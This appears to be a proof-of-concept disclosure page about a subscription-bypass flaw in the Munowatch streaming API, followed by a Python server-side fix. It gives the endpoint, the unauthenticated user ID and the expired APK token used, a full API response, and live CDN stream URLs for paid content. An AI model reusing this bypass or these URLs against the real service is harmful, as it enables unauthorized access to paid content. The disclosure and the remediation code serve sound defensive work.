SECURITY RESEARCH PoC  |  The video below plays from Munowatch CDN with NO valid subscription — server-side entitlement not enforced
CDN BYPASS DEMO — Munowatch CDN serves this video with no token, no auth header required
CDN bypass demonstration:
The API returned playingUrl for The Magic Blade with issubscriber: false and user_access: deny.
The video above plays from Munowatch's own CDN with zero authentication — any b-cdn.net URL is publicly accessible.
The Magic Blade
Vj Banks  |  Series  |  45h 32m  |  9 months ago

Twenty-four years ago, "God of Sabre" Yang Chang Feng was double-crossed and murdered by someone close to him. Now his son Fu Hong Xue, a skilled swordsman himself, sets out to avenge his father's death. During his journey, Hong Xue meets with kindness and treachery, is conflicted by love and hatred, and eventually discovers the shocking truth behind his birth.

API Response Evidence — Vulnerability Proof
Endpoint called: GET /api/preview/v2/59276/0
User ID used: 0 (no user / not logged in)
JWT used: Expired Feb 2024 (extracted from APK)
issubscriber: false
user_access:
paid_for: YES (premium content)
substatus: EXPIRED
serverhost: 80
video_name: P.1.The Magic Blade.VJ BANKS (2).mp4
playingUrl returned: YES — URL in response
API playingUrl value: https://munowatch.co/clips/ELI.mp4
CDN demo stream: https://nkuba.b-cdn.net/cleve48/cfr/In.The.Grey.mp4

Finding: The server sets user_access=deny and issubscriber=false but still returns playingUrl in the same response. Subscription is enforced client-side only — any caller with the expired APK JWT can obtain stream URLs without a subscription. Munowatch CDN (b-cdn.net) serves content with no auth required (direct HTTP Range requests succeed with HTTP 206).

{
    "id": 59276,
    "video_title": "The Magic Blade",
    "description": " Twenty-four years ago, \"God of Sabre\" Yang Chang Feng was double-crossed and murdered by someone close to him. Now his son Fu Hong Xue, a skilled swordsman himself, sets out to avenge his father's death. During his journey, Hong Xue meets with kindness and treachery, is conflicted by love and hatred, and eventually discovers the shocking truth behind his birth.",
    "video_name": "P.1.The Magic Blade.VJ BANKS (2).mp4",
    "filehistory": "",
    "openload": "0",
    "embedurl": "No",
    "serverhost": "80",
    "allow_openload": "0",
    "full_video_name": "",
    "duration": "45h 32m",
    "thumbnail": "https://apposters.b-cdn.net/laba/yo/naki/zXO1WRkaHa4948.jpg",
    "tfilehistory": "",
    "category_id": 5,
    "language_id": 1,
    "recording_date": "2025-09-19",
    "age_id": "18 +",
    "location": 1,
    "tab_category_id": 5,
    "series_code": "30809",
    "access": "1",
    "paid_for": "1",
    "new_movie": "1",
    "priority": "No",
    "size": "337.54 MB",
    "create_date": "2025-09-19 10:09:42",
    "schedule_date": "19.09.2025 10:36:01 AM",
    "user_id": 1118356,
    "vj_id": 43,
    "video_status_id": 0,
    "network_id": "45.221.10.185",
    "user_access": "",
    "notification": "No",
    "secduration": "163920.000000",
    "issubscriber": false,
    "genre": "Series",
    "vjname": "Vj Banks",
    "trailer_playing_url": "",
    "episodes": 28,
    "episode_state": "NEXT",
    "nxt_eps": "EPS   2",
    "nxt_eps_id": 59277,
    "nxt_eps_title": "The Magic Blade 2",
    "nxt_ldur": 0,
    "nxt_playing_url": "https://munowatch.co/clips/ELI.mp4",
    "playingUrl": "https://munowatch.co/clips/ELI.mp4",
    "ldur": 0,
    "session_id": "cb99afb5b31411a57538a97393de0e2e",
    "device": "web",
    "lang_name": "English to Luganda",
    "vjrelease": "9 months ago",
    "mstatus": false,
    "kstatus": "",
    "substatus": "EXPIRED"
}
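
A server-side fix for the finding above, as an added example that is not Munowatch's code: the API decides entitlement itself, omits stream URLs when access is denied, and hands entitled callers a short-lived signed URL that the CDN edge checks. The function names, the signing key, the `allow` value, the query-string layout and the placeholder path are assumptions made for illustration.

```python
import hashlib
import hmac
import time

SIGNING_KEY = b"constructed-demo-key"  # assumption: secret shared by API and CDN edge
STREAM_FIELDS = ("playingUrl", "nxt_playing_url")

def is_entitled(record, user_id, token_exp, now):
    """Decide access on the server from caller identity and subscription state."""
    if not user_id or token_exp <= now:   # anonymous caller (user 0) or expired JWT
        return False
    if record.get("paid_for") != "1":     # free title: any authenticated caller
        return True
    return record.get("issubscriber") is True and record.get("substatus") != "EXPIRED"

def _sig(path, user_id, expires):
    msg = f"{path}|{user_id}|{expires}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()

def sign_path(path, user_id, now, ttl=300):
    """Short-lived URL bound to one user; the edge rejects anything unsigned."""
    expires = int(now) + ttl
    return f"{path}?uid={user_id}&expires={expires}&sig={_sig(path, user_id, expires)}"

def edge_allows(path, user_id, expires, sig, now):
    """Check the CDN edge would run before serving any byte range."""
    if int(expires) < now:
        return False
    return hmac.compare_digest(_sig(path, user_id, int(expires)), sig)

def build_response(record, user_id, token_exp, now=None):
    """Return the API payload; stream URLs are present only when entitled."""
    now = time.time() if now is None else now
    out = dict(record)
    allowed = is_entitled(record, user_id, token_exp, now)
    out["user_access"] = "allow" if allowed else "deny"  # "allow" is an assumed value
    for field in STREAM_FIELDS:
        path = record.get(field, "")
        out[field] = sign_path(path, user_id, now) if allowed and path else ""
    return out

# Constructed record mirroring fields of the response above (path is a placeholder).
DENIED = {"id": 59276, "paid_for": "1", "issubscriber": False, "substatus": "EXPIRED",
          "playingUrl": "/clips/placeholder.mp4", "nxt_playing_url": "/clips/placeholder.mp4"}

if __name__ == "__main__":
    print(build_response(DENIED, user_id=0, token_exp=0))
```

The edge check only helps if the CDN zone refuses requests that carry no valid signature, so the unsigned origin path must not stay publicly reachable.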